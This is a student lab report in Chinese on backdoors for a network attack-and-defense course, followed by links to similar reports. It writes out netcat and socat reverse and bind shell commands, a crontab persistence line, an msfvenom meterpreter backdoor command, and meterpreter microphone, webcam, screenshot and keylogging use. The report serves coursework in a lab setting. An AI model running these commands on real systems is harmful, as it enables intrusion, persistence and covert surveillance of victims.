2018-2019-2 网络对抗技术 20165320 Exp2 后门原理与实践
后门原理与实践
windows获取Linux操作Shell
获取本机的IP
netcat介绍:一个进行基本的TCP、UDP数据收发的工具
相关的参数与具体用法
windows打开监听:
ncat.exe -l -p 5320(学号)
Linux反弹连接windows
nc IP 5320(学号) -e /bin/sh
windows命令行内输入ls,查看实验结果如下:
Linux获取Windows操作shell
Linux运行监听:
nc -l -p 5320
Windows反连接Linux:
ncat.exe -e cmd.exe ip_of_linux 5320
Linux下能够看到windows命令行的提示符,实验结果如下:
使用ncat进行数据的传输
Linux运行监听
Windows反连接Linux
Linux命令行中输入数据,Windows能收到:
使用ncat进行文件传输
windows运行监听
ncat.exe -l 5320 > 20165320.txt
Linux反连接windows
nc 192.168.1.143 5320 < 20165320.txt
查看运行结果如下:
过程中遇到的问题:我尝试过用Linux运行监听,windows反连接Linux,但是一直提示“由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败”,尝试过关闭防火墙,但是依旧没有用,目前还没找到问题所在。
使用netcat获取主机操作的Shell,cron启动
在win10系统下启动监听:
ncat.exe -l 5320
在Kali中使用crontab指令编辑一条任务,在任务的最后一行添加这样一行:
每小时多少分钟进行一次反连接 + * * * * /bin/netcat 监听的主机的IP 5320 -e /bin/sh
等到时间在win10命令行中输入相关命令查看实验结果:
使用socat获取主机操作Shell,任务计划启动
socat相关介绍:查找学姐的博客的相关内容能了解到socat是ncat的增强版,能够建立两个双向的字节流传输数据,具体格式为 socat + 选项 + 地址 + 地址
在win10系统进入计算机管理界面
创建一个任务并添加一个触发器,在操作选项中添加socat的文件路径,并在添加参数输入框中输入:
tcp-listen:5320 exec:cmd.exe,pty,stderr
(命令前面能看懂是将cmd.exe与端口号绑定,后面那一串只知道stderr是标准错误输出设备,stdout是标准输入设备)
锁屏后重新登陆查看到改任务已经运行成功
在Kali虚拟机的命令行中输入如下指令:socat - tcp:192.168.1.143:5320,实验结果如下:
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP LPORT=5320 -f exe > 20165320_backdoor.exe
生成一个后门程序,其中LHOST与LPORT应该是后门程序在被攻击主机中运行时,反连接所需要的地址与端口号。
然后通过nc与ncat.exe将后门程序传送到被攻击主机
在Kali虚拟机使用msfconsole指令进入控制台,使用监听模块设置payload,设置反弹回连的IP和端口,设置完成后执行监听。
windows运行后门程序,此时Kali能获得windows的远程Shell,结果如下:
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容
使用getuid指令获取用户名
使用record_mic指令截获一段音频
使用webcam获取摄像头的权限进行拍照:
使用screenshot进行截屏
使用keyscan_start指令记录击键过程,使用keyscan_dump获取相关记录
例举你能想到的一个后门进入到你系统中的可能方式
答:一个很明显的方式就是很多同学在某些游戏网站上下载盗版游戏时会有很多捆绑软件,这些软件毫无疑问是一些后门程序
例举你知道的后门如何启动起来(win及linux)的方式?
答:钓鱼,诱使用户点击一些不明链接,打开一些不明文件,图片
Meterpreter有哪些给你映像深刻的功能?
答:能生成一些后门程序,这个比较方便
如何发现自己有系统有没有被安装后门?
答:好像能通过查看系统进程与一些自启动项,装杀毒软件来进行防护
实验体会
- 这一次实验能让自己有一种真正接触到网络攻防的感觉,但是仔细想了一下,做的还是一些特别简单的东西,现实生活中很难使用这样的手段达到攻击的目标,所以还需要努力学习专业知识,争取能学到一些比较厉害的技术。
转载于:https://www.cnblogs.com/Gst-Paul/p/10581297.html
2018-2019-2 网络对抗技术 20165320 Exp2 后门原理与实践相关推荐
- 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp2 后门原理与实践 目录 0. 基础知识 1. 实验内容 1.0 常用后门工具 1.1 使用netcat获取主机操作S ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- 2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作 ...
- 2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Sh ...
- 20165214 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week4
<网络对抗技术>Exp2 PC平台逆向破解之"MAL_简单后门" Week4 一.实验内容 本次实验对象为名为pwn1的pwn1的linux可执行文件.程序正常执行流程 ...
- 2018-2019-2 20165303《网络对抗技术》Exp2 后门原理与实践
实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter( ...
- 2018-2019-2 网络对抗技术 20165328 Exp2 后门原理与实践
实验内容: 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执 ...
- 2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理与实践
实验二 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其 ...
最新文章
- symfony 2 app.php,Symfony2安装的方法(2种方法)
- git status中文显示乱码
- 经典题目螺旋方阵的详解
- 深入浅出空间索引:2
- lte核心网由哪些设备组成_电气设备安装工程由哪些部分组成?
- JSP知识点大致介绍1
- Gartner最新数据报告 WP系统仅剩1%
- MacBookpro安装mysql教程_mac安装mysql的两种方法
- API安全风险与防范
- 【Java工具类】非对称加密之RSA算法工具类(分段处理)
- c语言常量10进制,C语言常量
- 影响下载速度的因素--总结
- 为win7系统盘减肥
- 怎样用c语言制作文件保险箱,开题(电子保险箱)技巧.doc
- 手机外放没有声音_手机外放没声音,插入耳机有声音
- 华清见远 pcie网卡驱动_使用PCIe交换网结构在多主机系统中优化资源部署
- 把Mitre SFR 1.4.2源码打包成MFC风格的exe
- 《ERROR: MobSDK已停止支持非严格模式版本,请按上面编译告示接入合规版本》
- cf战队模板(html),cf战队 cf主力比赛接待战队专属频道模版
- oracle中dbms_DBMS中的关系演算
热门文章
- 实际返回的行数超出请求的行数怎么解决_count(*)这么慢,我该怎么办?
- matlab repmat函数_Matlab向量化编程在二级劝退学科中的一个应用例子
- 洛谷 深基 第4部分 基础数学与数论(19-21课)
- 使用php自动将文章标题或内容进行分词,添加和删除标签功能实例!
- 数字系统设计学习之出租车计价器设计
- 西贝莜面村员工手册_西贝那达慕草原美食节 引领文化生活新消费
- 【全网最全】一文搞定 Linux 压缩、解压哪些事儿
- thinkphp 模板页面出现空白
- 无刷电调_新款好盈XR10 PRO G2电调搭载XRAY T4车架简评
- Android逆向笔记-大部分内购游戏破解思路